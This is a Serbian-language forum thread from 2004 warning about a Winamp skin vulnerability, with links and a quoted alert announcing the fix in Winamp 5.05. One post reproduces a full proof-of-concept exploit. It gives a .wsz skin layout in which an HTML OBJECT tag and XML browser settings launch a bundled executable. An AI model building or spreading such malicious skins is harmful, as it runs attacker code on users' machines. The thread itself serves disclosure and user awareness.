Winamp skinovi - potencijalna opasnost

Winamp skinovi - potencijalna opasnost

offline
  • Pridružio: 04 Sep 2003
  • Poruke: 24130
  • Gde živiš: Wien

Kako izvestava news.com a prenosi softpedia, Winamp-ov nacin ucitavanja skinova omogucava izvrsenje podmetnutog izvrsnog fajla. Vise Procitajte na: http://news.softpedia.com/news/2/2004/August/9429.shtml



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • gamzzy 
  • Legendarni građanin
  • Pridružio: 24 Apr 2003
  • Poruke: 10725
  • Gde živiš: Novi Sad

Pitao sam se da li će iko reagovati na to... "pokretanjem skin-a" se on samo iskopira tamo gde treba sa sve njegovim sadržajem, a iako je to u stvari zip arhiva raspakuje se korišćenjem istog.



offline
  • SVITAC 
  • Legendarni građanin
  • Pridružio: 28 Apr 2003
  • Poruke: 5919
  • Gde živiš: Beograd

Da je samo kopiranje .. možda to ne bi bio veći broblem .. ali se radi i o pokretanju istog ..

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Winamp <=5.04 Skin File (.wsz) Remote Code Execution Exploit



This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !


skinhead.wsz (skinhead.zip)
-----------------------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml


/html/test.htm
----------------
<html>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>
</html>


/xml/includes.xml
-------------------
<include file="player.xml"/>


/xml/player-normal.xml
-------------------------
<layout>
<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />
</layout>


/xml/player.xml
-----------------
<container id="main" name="main">
<include file="player-normal.xml"/>
</container>


/skin.xml
---------
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<skininfo>
<version>1.0</version>
<name>Batman</name>
<comment></comment>
<author>Petrol Designs</author>
<email>info@petroldesigns.com</email>
<homepage>http://www.petroldesigns.com</homepage>
</skininfo>

<include file="xml/includes.xml"/>
<!--
-->
</WinampAbstractionLayer>

offline
  • Puky  Male
  • Scottish rebel
  • Pridružio: 18 Apr 2003
  • Poruke: 5815
  • Gde živiš: u Zmajevom gnjezdu

AxeZ ::
There is no patch for this vulnerability -> Do not use Winamp !


Ma super ... kako da ga ne koristim.
Resenje : ne instalirati skinove.

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

From:
K-OTiK Security <Special-Alerts@k-otik.com>


To:
bugtraq@securityfocus.com


Date:
Today 03:56:12 pm

In-Reply-To: <20040826164943.17362.qmail@www.securityfocus.com>

Nullsoft has issued a fix for this critical vulnerability affecting Winamp 3.0, 5.0 and 5.0 Pro or newer.

Nullsoft said that Winamp 5.05 resolves this exploit in two ways:

- Winamp will now prompt all users with a confirmation window before installing any skins.
- Winamp will now only extract files considered low risk before loading a Winamp Skin.

ALL Winamp users MUST upgrade to Winamp 5.05 immediately.

http://www.winamp.com/player/

Regards.
K-OTik.COM Security Survey Team
http://www.k-otik.com

offline
  • Goran 
  • Prof.Mr.Dr.Sci. Traumatologije
  • Pridružio: 05 Maj 2003
  • Poruke: 9977
  • Gde živiš: Singidunum

Postoji puno alternativa, nego ljudi navikli na "Winamp" pa to ti je.

offline
  • Piksi  Male
  • Elitni građanin
  • Pridružio: 13 Nov 2003
  • Poruke: 2435

Mislim da najmanje 60 % korisnika Windows-a koristi Winamp...tako da ce biti tesko odvici se!!! U ostalom mozemo da koristimo Klasicni skin ili MODERN skin...tako da odvikavanje nije potrebno!

Ko je trenutno na forumu
 

Ukupno su 625 korisnika na forumu :: 30 registrovanih, 6 sakrivenih i 589 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 1567 - dana 15 Jul 2016 19:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Petar, A.R.Chafee.Jr., Andrej Jovanovic, baza, BlackPhantom, Blagojević Mlađan, Boris90, cavatina, Cvijo_ue, DENA, dragoljub11987, frenki1986, indja, Insan2, ivica976, jaeger, lord sir giga, Megapurpletv, Mercury, nemanja.tatic, pein, pristinski korpus, royst33, S-lash, shmele2, Shomy2, Snorks, sombrero, Toni, voja64